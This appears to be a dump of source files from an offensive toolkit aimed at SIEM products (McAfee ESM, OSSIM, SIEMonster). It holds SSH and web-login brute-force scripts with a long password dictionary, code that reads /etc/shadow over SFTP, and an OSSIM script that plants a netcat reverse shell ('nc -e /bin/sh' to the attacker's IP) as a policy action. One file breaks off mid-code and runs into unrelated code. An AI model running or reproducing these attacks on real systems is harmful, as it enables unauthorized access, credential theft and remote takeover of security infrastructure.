nmap.PortScanner() 21 | bps = 0 22 | 23 | try: 24 | nm.scan(hosts=ip, arguments='-sT -T4 -p 22') 25 | if nm[ip]['tcp'][22]['state'] == 'open': 26 | for line in file: 27 | password = line.strip('\n\r') 28 | if ssh_credentials(ip, password): 29 | mess = ['root', password] 30 | globals.messages(7) 31 | globals.messages(9, mess) 32 | file.close() 33 | bps = 1 34 | break 35 | if bps == 0: 36 | globals.messages(8) 37 | file.close() 38 | else: 39 | globals.messages(8) 40 | file.close() 41 | 42 | except Exception as e: 43 | globals.messages(8) 44 | file.close() 45 | logging.error(e, exc_info=True) 46 | 47 | 48 | def ssh_credentials(ip, password): 49 | ssh = paramiko.SSHClient() 50 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 51 | try: 52 | ssh.connect(ip, username='root', password=password, 53 | 
banner_timeout=2000) 54 | return True 55 | except paramiko.AuthenticationException: 56 | return False 57 | -------------------------------------------------------------------------------- /mcafee/obtainsysteminfo.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # Obtain system info of McAfee with SSH 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | import globals 8 | import paramiko 9 | 10 | from colorama import Fore 11 | from colorama import Style 12 | 13 | 14 | # %%%%%%%%%% Functions %%%%%%%%%# 15 | 16 | 17 | def mcafee_ssh_info(ip): 18 | password = input(Fore.CYAN + Style.NORMAL + 19 | "[!] Enter McAfee root's password: " + Style.RESET_ALL) 20 | 21 | ssh = paramiko.SSHClient() 22 | ssh.load_system_host_keys() 23 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 24 | try: 25 | ssh.connect(ip, username='root', password=password, 26 | banner_timeout=200) 27 | globals.mcafee_messages(1) 28 | 29 | commands = [ 30 | ("hostname", "[!] Hostname"), 31 | ("chkconfig --list | grep \'5:on\' | awk \'{print $1}\'", 32 | "[!] Active Service"), 33 | ("ifconfig", "[!] Network Configuration"), 34 | ("iptables -nL", "[!] FW Configuration") 35 | ] 36 | 37 | for command in commands: 38 | std, stdout, stderr = ssh.exec_command(command[0]) 39 | if stdout != "": 40 | print(Fore.GREEN + Style.NORMAL + command[1]) 41 | print(Fore.GREEN + Style.NORMAL + globals.SEPARATOR 42 | + Style.RESET_ALL) 43 | for i in stdout.readlines(): 44 | print('[!] 
' + i.replace('\n', '')) 45 | 46 | ssh.close() 47 | 48 | except paramiko.AuthenticationException: 49 | globals.messages(10) 50 | ssh.close() 51 | 52 | # %%%%%%%%%% The End %%%%%%%%%%# 53 | -------------------------------------------------------------------------------- /mcafee/obtainuserssystem.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # Obtain system users of McAfee with SSH (reads /etc/shadow over SFTP) 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | import globals 8 | import paramiko 9 | from colorama import Fore 10 | from colorama import Style 11 | 12 | # %%%%%%%%%% Functions %%%%%%%%%# 13 | 14 | 15 | def mcafee_users_server(ip): 16 | password = input( 17 | Fore.CYAN + Style.NORMAL + "[!] Enter McAfee root's password: " 18 | + Style.RESET_ALL) 19 | 20 | ssh = paramiko.SSHClient() 21 | ssh.load_system_host_keys() 22 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 23 | try: 24 | ssh.connect(ip, username='root', password=password, 25 | banner_timeout=200) 26 | sftp = ssh.open_sftp() 27 | shadow_file = sftp.open('/etc/shadow') 28 | globals.mcafee_messages(2) 29 | for line in shadow_file: 30 | print('[!] 
' + line.replace('\n', '')) 31 | 32 | shadow_file.close() 33 | ssh.close() 34 | 35 | except paramiko.AuthenticationException: 36 | globals.messages(10) 37 | ssh.close() 38 | 39 | 40 | # %%%%%%%%%% The End %%%%%%%%%%# 41 | -------------------------------------------------------------------------------- /mcafee/obtainwebinfo.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # Obtain system information of McAfee via the web API (authenticated as NGCP) 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | 8 | import json 9 | import base64 10 | import globals 11 | import requests 12 | import logging 13 | 14 | from colorama import Fore 15 | from colorama import Style 16 | 17 | # %%%%%%%%%% Functions %%%%%%%%%# 18 | 19 | 20 | def mcafee_webinfo(ip, port): 21 | agents = 'Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/47.0' 22 | a = 0 23 | password = input( 24 | Fore.CYAN + Style.NORMAL + "[!] Enter password of the user Web NGCP: " 25 | + Style.RESET_ALL) 26 | url1 = globals.https + ip + ":" + str(port) + "/ess" 27 | url2 = globals.https + ip + ":" + str(port) + "/rs/esm/v2/login" 28 | url3 = globals.https + ip + ":" + str(port) + "/rs/v1/systemInformation" 29 | headers = { 30 | 'Accept': 'application/json,text/plain,*/*', 31 | 'DNT': '1', 32 | 'Host': ip, 33 | 'Origin': globals.https + ip, 34 | 'Referer': globals.https + ip, 35 | 'User-Agent': agents[a], 36 | 'Content-Type': 'application/json;charset=utf-8', 37 | 'Connection': 'keep - alive', 38 | 'X-Xsrf-Token': 'null' 39 | } 40 | 41 | params = { 42 | 'username': 'TkdDUA==', 43 | 'password': str(base64.b64encode(password.encode('utf-8')), 'utf-8'), 44 | 'locale': 'en_US', 45 | 'os': "Linux x86_64" 46 | } 47 | json_params = json.dumps(params).encode('utf-8') 48 | data_show = [ 49 | 'callHomeIp', 'releaseNumber', 'hdd', 50 | 'ram', 'processor', 'esssystemTime', 51 | 'statusAndAlertNextCheckIn', 'rulesAndSoftNextCheck', 'backupNextTime' 52 | ] 53 | 54 | try: 55 | requests.post( 56 | url1, 
data='Request=API%13CAC%5FLOGIN%13%14', 57 | headers=headers, verify=False) 58 | headers['Accept'] = 'application/json' 59 | response = requests.post( 60 | url2, data=json_params, headers=headers, verify=False) 61 | if response.status_code == 201: 62 | headers['Cookie'] = response.headers['Set-Cookie'] 63 | headers['X-Xsrf-Token'] = response.headers['xsrf-token'] 64 | response2 = requests.get(url3, headers=headers, verify=False) 65 | globals.mcafee_messages(1) 66 | data = json.loads(response2.text) 67 | for field in data_show: 68 | if data[field] != "": 69 | print('[!] ' + field + ': ' + str(data[field])) 70 | else: 71 | globals.messages(10) 72 | 73 | except Exception as e: 74 | logging.error(e, exc_info=True) 75 | 76 | # %%%%%%%%%% The End %%%%%%%%%%# 77 | -------------------------------------------------------------------------------- /ossim/bruteforceossim.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # OSSIM Login Bruteforce 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | import os 8 | import base64 9 | import globals 10 | import logging 11 | import requests 12 | 13 | # %%%%%%%%%% Functions %%%%%%%%%# 14 | 15 | 16 | def ossim_brute(ip, port): 17 | 18 | url = globals.https + ip + ":" + str(port) + "/ossim/session/login.php" 19 | __location__ = os.path.realpath(os.path.join( 20 | os.getcwd(), os.path.dirname(__file__))) 21 | file = open(os.path.join(__location__, 'dict.txt')) 22 | successurl = globals.https + ip + "/ossim/" 23 | bruteforceresult = 0 24 | 25 | for line in file: 26 | 27 | ossimpassword = line.strip('\n\r') 28 | ossimpasswordb64 = base64.b64encode(ossimpassword.encode("utf-8")) 29 | base64string = str(ossimpasswordb64, "utf-8") 30 | params = { 31 | 'embed': '', 32 | 'bookmark_string': '', 33 | 'user': 'admin', 34 | 'passu': ossimpassword, 35 | 'pass': base64string 36 | } 37 | 38 | try: 39 | response = requests.post(url, params=params, verify=False) 40 | 41 | if 
response.status_code == 302 or response.url == successurl: 42 | globals.messages(7) 43 | mess = ['admin', ossimpassword] 44 | globals.messages(9, mess) 45 | bruteforceresult = 1 46 | file.close() 47 | break 48 | 49 | except Exception as e: 50 | logging.error(e, exc_info=True) 51 | 52 | if not bruteforceresult: 53 | globals.messages(8) 54 | file.close() 55 | 56 | # %%%%%%%%%% The End %%%%%%%%%%# 57 | -------------------------------------------------------------------------------- /ossim/dict.txt: -------------------------------------------------------------------------------- 1 | ossim 2 | admin 3 | OSSIM 4 | 0ss1m 5 | Ossim 6 | ossim123 7 | ossim1 8 | ossim2 9 | ossim3 10 | ossim4 11 | ossim5 12 | ossim6 13 | ossim7 14 | ossim8 15 | ossim9 16 | ossim0 17 | ossim! 18 | ossim@ 19 | ossim# 20 | ossim$ 21 | ossim% 22 | ossim^ 23 | ossim& 24 | ossim* 25 | ossim? 26 | Ossim1 27 | Ossim2 28 | Ossim3 29 | Ossim4 30 | Ossim5 31 | Ossim6 32 | Ossim7 33 | Ossim8 34 | Ossim9 35 | Ossim0 36 | Ossim! 37 | Ossim@ 38 | Ossim# 39 | Ossim$ 40 | Ossim% 41 | Ossim^ 42 | Ossim& 43 | Ossim* 44 | Ossim? 45 | 0ssim1 46 | 0ssim2 47 | 0ssim3 48 | 0ssim4 49 | 0ssim5 50 | 0ssim6 51 | 0ssim7 52 | 0ssim8 53 | 0ssim9 54 | 0ssim0 55 | 0ssim! 56 | 0ssim@ 57 | 0ssim# 58 | 0ssim$ 59 | 0ssim% 60 | 0ssim^ 61 | 0ssim& 62 | 0ssim* 63 | 0ssim? 64 | Qssim1 65 | Qssim2 66 | Qssim3 67 | Qssim4 68 | Qssim5 69 | Qssim6 70 | Qssim7 71 | Qssim8 72 | Qssim9 73 | Qssim0 74 | Qssim! 75 | Qssim@ 76 | Qssim# 77 | Qssim$ 78 | Qssim% 79 | Qssim^ 80 | Qssim& 81 | Qssim* 82 | Qssim? 83 | oss1m1 84 | oss1m2 85 | oss1m3 86 | oss1m4 87 | oss1m5 88 | oss1m6 89 | oss1m7 90 | oss1m8 91 | oss1m9 92 | oss1m0 93 | oss1m! 94 | oss1m@ 95 | oss1m# 96 | oss1m$ 97 | oss1m% 98 | oss1m^ 99 | oss1m& 100 | oss1m* 101 | oss1m? 102 | Oss1m1 103 | Oss1m2 104 | Oss1m3 105 | Oss1m4 106 | Oss1m5 107 | Oss1m6 108 | Oss1m7 109 | Oss1m8 110 | Oss1m9 111 | Oss1m0 112 | Oss1m! 
113 | Oss1m@ 114 | Oss1m# 115 | Oss1m$ 116 | Oss1m% 117 | Oss1m^ 118 | Oss1m& 119 | Oss1m* 120 | Oss1m? 121 | 0ss1m1 122 | 0ss1m2 123 | 0ss1m3 124 | 0ss1m4 125 | 0ss1m5 126 | 0ss1m6 127 | 0ss1m7 128 | 0ss1m8 129 | 0ss1m9 130 | 0ss1m0 131 | 0ss1m! 132 | 0ss1m@ 133 | 0ss1m# 134 | 0ss1m$ 135 | 0ss1m% 136 | 0ss1m^ 137 | 0ss1m& 138 | 0ss1m* 139 | 0ss1m? 140 | Qss1m1 141 | Qss1m2 142 | Qss1m3 143 | Qss1m4 144 | Qss1m5 145 | Qss1m6 146 | Qss1m7 147 | Qss1m8 148 | Qss1m9 149 | Qss1m0 150 | Qss1m! 151 | Qss1m@ 152 | Qss1m# 153 | Qss1m$ 154 | Qss1m% 155 | Qss1m^ 156 | Qss1m& 157 | Qss1m* 158 | Qss1m? 159 | ossim11 160 | ossim12 161 | ossim13 162 | ossim14 163 | ossim15 164 | ossim16 165 | ossim17 166 | ossim18 167 | ossim19 168 | ossim10 169 | ossim1! 170 | ossim1@ 171 | ossim1# 172 | ossim1$ 173 | ossim1% 174 | ossim1^ 175 | ossim1& 176 | ossim1* 177 | ossim1? 178 | Ossim11 179 | Ossim12 180 | Ossim13 181 | Ossim14 182 | Ossim15 183 | Ossim16 184 | Ossim17 185 | Ossim18 186 | Ossim19 187 | Ossim10 188 | Ossim1! 189 | Ossim1@ 190 | Ossim1# 191 | Ossim1$ 192 | Ossim1% 193 | Ossim1^ 194 | Ossim1& 195 | Ossim1* 196 | Ossim1? 197 | 0ssim11 198 | 0ssim12 199 | 0ssim13 200 | 0ssim14 201 | 0ssim15 202 | 0ssim16 203 | 0ssim17 204 | 0ssim18 205 | 0ssim19 206 | 0ssim10 207 | 0ssim1! 208 | 0ssim1@ 209 | 0ssim1# 210 | 0ssim1$ 211 | 0ssim1% 212 | 0ssim1^ 213 | 0ssim1& 214 | 0ssim1* 215 | 0ssim1? 216 | Qssim11 217 | Qssim12 218 | Qssim13 219 | Qssim14 220 | Qssim15 221 | Qssim16 222 | Qssim17 223 | Qssim18 224 | Qssim19 225 | Qssim10 226 | Qssim1! 227 | Qssim1@ 228 | Qssim1# 229 | Qssim1$ 230 | Qssim1% 231 | Qssim1^ 232 | Qssim1& 233 | Qssim1* 234 | Qssim1? 235 | ossim121 236 | ossim122 237 | ossim123 238 | ossim124 239 | ossim125 240 | ossim126 241 | ossim127 242 | ossim128 243 | ossim129 244 | ossim120 245 | ossim12! 246 | ossim12@ 247 | ossim12# 248 | ossim12$ 249 | ossim12% 250 | ossim12^ 251 | ossim12& 252 | ossim12* 253 | ossim12? 
254 | Ossim121 255 | Ossim122 256 | Ossim123 257 | Ossim124 258 | Ossim125 259 | Ossim126 260 | Ossim127 261 | Ossim128 262 | Ossim129 263 | Ossim120 264 | Ossim12! 265 | Ossim12@ 266 | Ossim12# 267 | Ossim12$ 268 | Ossim12% 269 | Ossim12^ 270 | Ossim12& 271 | Ossim12* 272 | Ossim12? 273 | 0ssim121 274 | 0ssim122 275 | 0ssim123 276 | 0ssim124 277 | 0ssim125 278 | 0ssim126 279 | 0ssim127 280 | 0ssim128 281 | 0ssim129 282 | 0ssim120 283 | 0ssim12! 284 | 0ssim12@ 285 | 0ssim12# 286 | 0ssim12$ 287 | 0ssim12% 288 | 0ssim12^ 289 | 0ssim12& 290 | 0ssim12* 291 | 0ssim12? 292 | Qssim121 293 | Qssim122 294 | Qssim123 295 | Qssim124 296 | Qssim125 297 | Qssim126 298 | Qssim127 299 | Qssim128 300 | Qssim129 301 | Qssim120 302 | Qssim12! 303 | Qssim12@ 304 | Qssim12# 305 | Qssim12$ 306 | Qssim12% 307 | Qssim12^ 308 | Qssim12& 309 | Qssim12* 310 | Qssim12? 311 | ossim1231 312 | ossim1232 313 | ossim1233 314 | ossim1234 315 | ossim1235 316 | ossim1236 317 | ossim1237 318 | ossim1238 319 | ossim1239 320 | ossim1230 321 | ossim123! 322 | ossim123@ 323 | ossim123# 324 | ossim123$ 325 | ossim123% 326 | ossim123^ 327 | ossim123& 328 | ossim123* 329 | ossim123? 330 | Ossim1231 331 | Ossim1232 332 | Ossim1233 333 | Ossim1234 334 | Ossim1235 335 | Ossim1236 336 | Ossim1237 337 | Ossim1238 338 | Ossim1239 339 | Ossim1230 340 | Ossim123! 341 | Ossim123@ 342 | Ossim123# 343 | Ossim123$ 344 | Ossim123% 345 | Ossim123^ 346 | Ossim123& 347 | Ossim123* 348 | Ossim123? 349 | 0ssim1231 350 | 0ssim1232 351 | 0ssim1233 352 | 0ssim1234 353 | 0ssim1235 354 | 0ssim1236 355 | 0ssim1237 356 | 0ssim1238 357 | 0ssim1239 358 | 0ssim1230 359 | 0ssim123! 360 | 0ssim123@ 361 | 0ssim123# 362 | 0ssim123$ 363 | 0ssim123% 364 | 0ssim123^ 365 | 0ssim123& 366 | 0ssim123* 367 | 0ssim123? 368 | Qssim1231 369 | Qssim1232 370 | Qssim1233 371 | Qssim1234 372 | Qssim1235 373 | Qssim1236 374 | Qssim1237 375 | Qssim1238 376 | Qssim1239 377 | Qssim1230 378 | Qssim123! 
379 | Qssim123@ 380 | Qssim123# 381 | Qssim123$ 382 | Qssim123% 383 | Qssim123^ 384 | Qssim123& 385 | Qssim123* 386 | Qssim123? 387 | oSSIM1 388 | oSSIM2 389 | oSSIM3 390 | oSSIM4 391 | oSSIM5 392 | oSSIM6 393 | oSSIM7 394 | oSSIM8 395 | oSSIM9 396 | oSSIM0 397 | oSSIM! 398 | oSSIM@ 399 | oSSIM# 400 | oSSIM$ 401 | oSSIM% 402 | oSSIM^ 403 | oSSIM& 404 | oSSIM* 405 | oSSIM? 406 | OSSIM1 407 | OSSIM2 408 | OSSIM3 409 | OSSIM4 410 | OSSIM5 411 | OSSIM6 412 | OSSIM7 413 | OSSIM8 414 | OSSIM9 415 | OSSIM0 416 | OSSIM! 417 | OSSIM@ 418 | OSSIM# 419 | OSSIM$ 420 | OSSIM% 421 | OSSIM^ 422 | OSSIM& 423 | OSSIM* 424 | OSSIM? 425 | 0SSIM1 426 | 0SSIM2 427 | 0SSIM3 428 | 0SSIM4 429 | 0SSIM5 430 | 0SSIM6 431 | 0SSIM7 432 | 0SSIM8 433 | 0SSIM9 434 | 0SSIM0 435 | 0SSIM! 436 | 0SSIM@ 437 | 0SSIM# 438 | 0SSIM$ 439 | 0SSIM% 440 | 0SSIM^ 441 | 0SSIM& 442 | 0SSIM* 443 | 0SSIM? 444 | QSSIM1 445 | QSSIM2 446 | QSSIM3 447 | QSSIM4 448 | QSSIM5 449 | QSSIM6 450 | QSSIM7 451 | QSSIM8 452 | QSSIM9 453 | QSSIM0 454 | QSSIM! 455 | QSSIM@ 456 | QSSIM# 457 | QSSIM$ 458 | QSSIM% 459 | QSSIM^ 460 | QSSIM& 461 | QSSIM* 462 | QSSIM? 
463 | biteme 464 | 1992 465 | london 466 | soccer 467 | william 468 | querty 469 | liverpool 470 | pussy 471 | admin123 472 | whatever 473 | dallas 474 | hockey 475 | test 476 | zaq1zaq1 477 | 1q2w3e 478 | aaaaaa 479 | killer 480 | bandit 481 | ashley 482 | cookie 483 | merlin 484 | trustno1 485 | 1991 486 | ranger 487 | chelsea 488 | banana 489 | jennifer 490 | 1990 491 | amanda 492 | 1989 493 | hunter 494 | nicole 495 | hello 496 | maverick 497 | blahblah 498 | mercedes 499 | corvette 500 | computer 501 | cheese 502 | ferrari 503 | starwars 504 | 1qaz2wsx 505 | andrea 506 | lakers 507 | andrew 508 | 12341234 509 | matthew 510 | robert 511 | 1234 512 | sophie 513 | pepper 514 | joshua 515 | tigger 516 | 55555 517 | jordan 518 | solo 519 | abcdef 520 | letmein 521 | ginger 522 | jessica 523 | 222222 524 | harley 525 | george 526 | summer 527 | thomas 528 | hannah 529 | daniel 530 | buster 531 | baseball 532 | passw0rd 533 | shadow 534 | freedom 535 | bailey 536 | 121212 537 | zxcvbnm 538 | qwerty123 539 | password1 540 | donald 541 | aa123456 542 | charlie 543 | !@#$%^&* 544 | 654321 545 | monkey 546 | 123123 547 | football 548 | abc123 549 | 666666 550 | welcome 551 | admin 552 | princess 553 | iloveyou 554 | qwerty 555 | sunshine 556 | 1234567 557 | 111111 558 | 12345 559 | 12345678 560 | 123456789 561 | password 562 | 123456 563 | admin1 564 | admin2 565 | admin3 566 | admin4 567 | admin5 568 | admin6 569 | admin7 570 | admin8 571 | admin9 572 | admin0 573 | admin! 574 | admin@ 575 | admin# 576 | admin$ 577 | admin% 578 | admin^ 579 | admin& 580 | admin* 581 | admin? 582 | Admin1 583 | Admin2 584 | Admin3 585 | Admin4 586 | Admin5 587 | Admin6 588 | Admin7 589 | Admin8 590 | Admin9 591 | Admin0 592 | Admin! 593 | Admin@ 594 | Admin# 595 | Admin$ 596 | Admin% 597 | Admin^ 598 | Admin& 599 | Admin* 600 | Admin? 601 | @dmin1 602 | @dmin2 603 | @dmin3 604 | @dmin4 605 | @dmin5 606 | @dmin6 607 | @dmin7 608 | @dmin8 609 | @dmin9 610 | @dmin0 611 | @dmin! 
612 | @dmin@ 613 | @dmin# 614 | @dmin$ 615 | @dmin% 616 | @dmin^ 617 | @dmin& 618 | @dmin* 619 | @dmin? 620 | 4dmin1 621 | 4dmin2 622 | 4dmin3 623 | 4dmin4 624 | 4dmin5 625 | 4dmin6 626 | 4dmin7 627 | 4dmin8 628 | 4dmin9 629 | 4dmin0 630 | 4dmin! 631 | 4dmin@ 632 | 4dmin# 633 | 4dmin$ 634 | 4dmin% 635 | 4dmin^ 636 | 4dmin& 637 | 4dmin* 638 | 4dmin? 639 | admin1231 640 | admin1232 641 | admin1233 642 | admin1234 643 | admin1235 644 | admin1236 645 | admin1237 646 | admin1238 647 | admin1239 648 | admin1230 649 | admin123! 650 | admin123@ 651 | admin123# 652 | admin123$ 653 | admin123% 654 | admin123^ 655 | admin123& 656 | admin123* 657 | admin123? 658 | Admin1231 659 | Admin1232 660 | Admin1233 661 | Admin1234 662 | Admin1235 663 | Admin1236 664 | Admin1237 665 | Admin1238 666 | Admin1239 667 | Admin1230 668 | Admin123! 669 | Admin123@ 670 | Admin123# 671 | Admin123$ 672 | Admin123% 673 | Admin123^ 674 | Admin123& 675 | Admin123* 676 | Admin123? 677 | @dmin1231 678 | @dmin1232 679 | @dmin1233 680 | @dmin1234 681 | @dmin1235 682 | @dmin1236 683 | @dmin1237 684 | @dmin1238 685 | @dmin1239 686 | @dmin1230 687 | @dmin123! 688 | @dmin123@ 689 | @dmin123# 690 | @dmin123$ 691 | @dmin123% 692 | @dmin123^ 693 | @dmin123& 694 | @dmin123* 695 | @dmin123? 696 | 4dmin1231 697 | 4dmin1232 698 | 4dmin1233 699 | 4dmin1234 700 | 4dmin1235 701 | 4dmin1236 702 | 4dmin1237 703 | 4dmin1238 704 | 4dmin1239 705 | 4dmin1230 706 | 4dmin123! 707 | 4dmin123@ 708 | 4dmin123# 709 | 4dmin123$ 710 | 4dmin123% 711 | 4dmin123^ 712 | 4dmin123& 713 | 4dmin123* 714 | 4dmin123? 715 | admin121 716 | admin122 717 | admin123 718 | admin124 719 | admin125 720 | admin126 721 | admin127 722 | admin128 723 | admin129 724 | admin120 725 | admin12! 726 | admin12@ 727 | admin12# 728 | admin12$ 729 | admin12% 730 | admin12^ 731 | admin12& 732 | admin12* 733 | admin12? 
734 | Admin121 735 | Admin122 736 | Admin123 737 | Admin124 738 | Admin125 739 | Admin126 740 | Admin127 741 | Admin128 742 | Admin129 743 | Admin120 744 | Admin12! 745 | Admin12@ 746 | Admin12# 747 | Admin12$ 748 | Admin12% 749 | Admin12^ 750 | Admin12& 751 | Admin12* 752 | Admin12? 753 | @dmin121 754 | @dmin122 755 | @dmin123 756 | @dmin124 757 | @dmin125 758 | @dmin126 759 | @dmin127 760 | @dmin128 761 | @dmin129 762 | @dmin120 763 | @dmin12! 764 | @dmin12@ 765 | @dmin12# 766 | @dmin12$ 767 | @dmin12% 768 | @dmin12^ 769 | @dmin12& 770 | @dmin12* 771 | @dmin12? 772 | 4dmin121 773 | 4dmin122 774 | 4dmin123 775 | 4dmin124 776 | 4dmin125 777 | 4dmin126 778 | 4dmin127 779 | 4dmin128 780 | 4dmin129 781 | 4dmin120 782 | 4dmin12! 783 | 4dmin12@ 784 | 4dmin12# 785 | 4dmin12$ 786 | 4dmin12% 787 | 4dmin12^ 788 | 4dmin12& 789 | 4dmin12* 790 | 4dmin12? 791 | admin1231 792 | admin1232 793 | admin1233 794 | admin1234 795 | admin1235 796 | admin1236 797 | admin1237 798 | admin1238 799 | admin1239 800 | admin1230 801 | admin123! 802 | admin123@ 803 | admin123# 804 | admin123$ 805 | admin123% 806 | admin123^ 807 | admin123& 808 | admin123* 809 | admin123? 810 | Admin1231 811 | Admin1232 812 | Admin1233 813 | Admin1234 814 | Admin1235 815 | Admin1236 816 | Admin1237 817 | Admin1238 818 | Admin1239 819 | Admin1230 820 | Admin123! 821 | Admin123@ 822 | Admin123# 823 | Admin123$ 824 | Admin123% 825 | Admin123^ 826 | Admin123& 827 | Admin123* 828 | Admin123? 829 | @dmin1231 830 | @dmin1232 831 | @dmin1233 832 | @dmin1234 833 | @dmin1235 834 | @dmin1236 835 | @dmin1237 836 | @dmin1238 837 | @dmin1239 838 | @dmin1230 839 | @dmin123! 840 | @dmin123@ 841 | @dmin123# 842 | @dmin123$ 843 | @dmin123% 844 | @dmin123^ 845 | @dmin123& 846 | @dmin123* 847 | @dmin123? 848 | 4dmin1231 849 | 4dmin1232 850 | 4dmin1233 851 | 4dmin1234 852 | 4dmin1235 853 | 4dmin1236 854 | 4dmin1237 855 | 4dmin1238 856 | 4dmin1239 857 | 4dmin1230 858 | 4dmin123! 
859 | 4dmin123@ 860 | 4dmin123# 861 | 4dmin123$ 862 | 4dmin123% 863 | 4dmin123^ 864 | 4dmin123& 865 | 4dmin123* 866 | 4dmin123? -------------------------------------------------------------------------------- /ossim/maliciousaction.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # OSSIM Obtain Reverse Shell from Malicious Action 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | import re 8 | import base64 9 | import globals 10 | import getpass 11 | import logging 12 | import paramiko 13 | import requests 14 | 15 | from colorama import Fore, Style 16 | from colorama import init 17 | 18 | init() 19 | 20 | # %%%%%%%%%% Functions %%%%%%%%%# 21 | 22 | 23 | def create_policy(ossimip, ossimport): 24 | authurl = globals.https + ossimip + ":" + str( 25 | ossimport) + "/ossim/session/login.php" 26 | actionurl = globals.https + ossimip + ":" + str( 27 | ossimport) + "/ossim/action/modifyactions.php" 28 | getactionurl = globals.https + ossimip + ":" + str( 29 | ossimport) + "/ossim/action/getaction.php" 30 | getctxurl = globals.https + ossimip + ":" + str( 31 | ossimport) + "/ossim/policy/policy.php?m_opt=configuration&sm_opt=threat_intelligence" 32 | policyurl = globals.https + ossimip + ":" + str( 33 | ossimport) + "/ossim/policy/newpolicy.php" 34 | reloadurl = globals.https + ossimip + ":" + str( 35 | ossimport) + "/ossim/conf/reload.php?what=policies&back=..%2Fpolicy%2Fpolicy.php" 36 | ossimpass = getpass.getpass( 37 | Fore.CYAN + Style.BRIGHT + "[!] Enter OSSIM Admin Password: " + 38 | Style.RESET_ALL) 39 | local_ip = input("[!] 
Enter your local IP address: ") 40 | actionid = '' 41 | ctxfinal = '' 42 | 43 | ossimpasswordb64 = base64.b64encode(ossimpass.encode("utf-8")) 44 | base64string = str(ossimpasswordb64, "utf-8") 45 | paramsauth = { 46 | 'embed': '', 47 | 'bookmark_string': '', 48 | 'user': 'admin', 49 | 'passu': ossimpass, 50 | 'pass': base64string 51 | } 52 | # netcat reverse shell 53 | netcatcommand = "nc+-e+%2Fbin%2Fsh+" + local_ip + "+12345" 54 | paramsaction = \ 55 | "id=&action=new&old_name=&action_name=testossim&old_descr=&descr=testossim" \ 56 | "&action_type=2&only=on&cond=True&email_from=&email_to=&email_subject"\ 57 | "=&email_message=&exec_command=" + netcatcommand + "&transferred_user=" 58 | 59 | try: 60 | s = requests.Session() 61 | s.post(authurl, data=paramsauth, verify=False) 62 | s.headers.update({'Content-Type': 'application/x-www-form-urlencoded'}) 63 | globals.ossim_messages(1) 64 | 65 | action = s.post(actionurl, data=paramsaction, verify=False) 66 | 67 | if action.status_code == 200 and "Action successfully updated" in action.text: 68 | 69 | actions = s.post( 70 | getactionurl, 71 | data="page=1&rp=20&sortname=descr&sortorder=asc&query=&qtype=", 72 | verify=False) 73 | rows = actions.text.split('SIEMonster ' in response.text: 191 | siemdetected = "SIEMonster" 192 | globals.messages(5, [siemdetected, siemport]) 193 | return siemdetected 194 | except Exception as e: 195 | logging.error(e, exc_info=True) 196 | 197 | 198 | def scan_network(siemnet): 199 | 200 | try: 201 | nm = nmap.PortScanner() 202 | nm.scan(hosts=siemnet, arguments='-PS -Pn -p 8089,443,9000') 203 | return nm.all_hosts() 204 | 205 | except Exception as e: 206 | logging.error(e, exc_info=True) 207 | 208 | # %%%%%%%%%% The End %%%%%%%%%%# 209 | -------------------------------------------------------------------------------- /siemonster/bfssh_smonster.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # SIEMonster SSH Bruteforce 4 
| 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | 8 | import os 9 | import nmap 10 | import globals 11 | import logging 12 | import paramiko 13 | 14 | # %%%%%%%%%% Functions %%%%%%%%%# 15 | 16 | 17 | def smonster_ssh_bf(ip): 18 | __location__ = os.path.realpath( 19 | os.path.join(os.getcwd(), os.path.dirname(__file__))) 20 | file = open(os.path.join(__location__, 'dict.txt')) 21 | nm = nmap.PortScanner() 22 | bps = 0 23 | 24 | try: 25 | nm.scan(hosts=ip, arguments='-sT -T4 -p 22') 26 | if nm[ip]['tcp'][22]['state'] == 'open': 27 | for line in file: 28 | password = line.strip('\n\r') 29 | if ssh_credentials(ip, password): 30 | mess = ['deploy', password] 31 | globals.messages(7) 32 | globals.messages(9, mess) 33 | file.close() 34 | bps = 1 35 | break 36 | if bps == 0: 37 | globals.messages(8) 38 | file.close() 39 | else: 40 | globals.messages(8) 41 | file.close() 42 | 43 | except Exception as e: 44 | globals.messages(8) 45 | file.close() 46 | logging.error(e, exc_info=True) 47 | 48 | 49 | def ssh_credentials(ip, password): 50 | ssh = paramiko.SSHClient() 51 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 52 | try: 53 | ssh.connect(ip, username='deploy', password=password, 54 | banner_timeout=2000) 55 | return True 56 | except paramiko.AuthenticationException: 57 | return False 58 | -------------------------------------------------------------------------------- /siemonster/systeminfo_smonster.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # Obtain system info of SIEMonster with SSH 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | import globals 8 | import paramiko 9 | from colorama import Fore 10 | from colorama import Style 11 | 12 | # %%%%%%%%%%% Constants %%%%%%%%%%%# 13 | 14 | SEPARATOR = "[*] {0} [*]".format('=' * 110) 15 | 16 | # %%%%%%%%%% Functions %%%%%%%%%# 17 | 18 | 19 | def smonster_ssh_info(ip): 20 | password = input( 21 | Fore.CYAN + Style.NORMAL + "[!] 
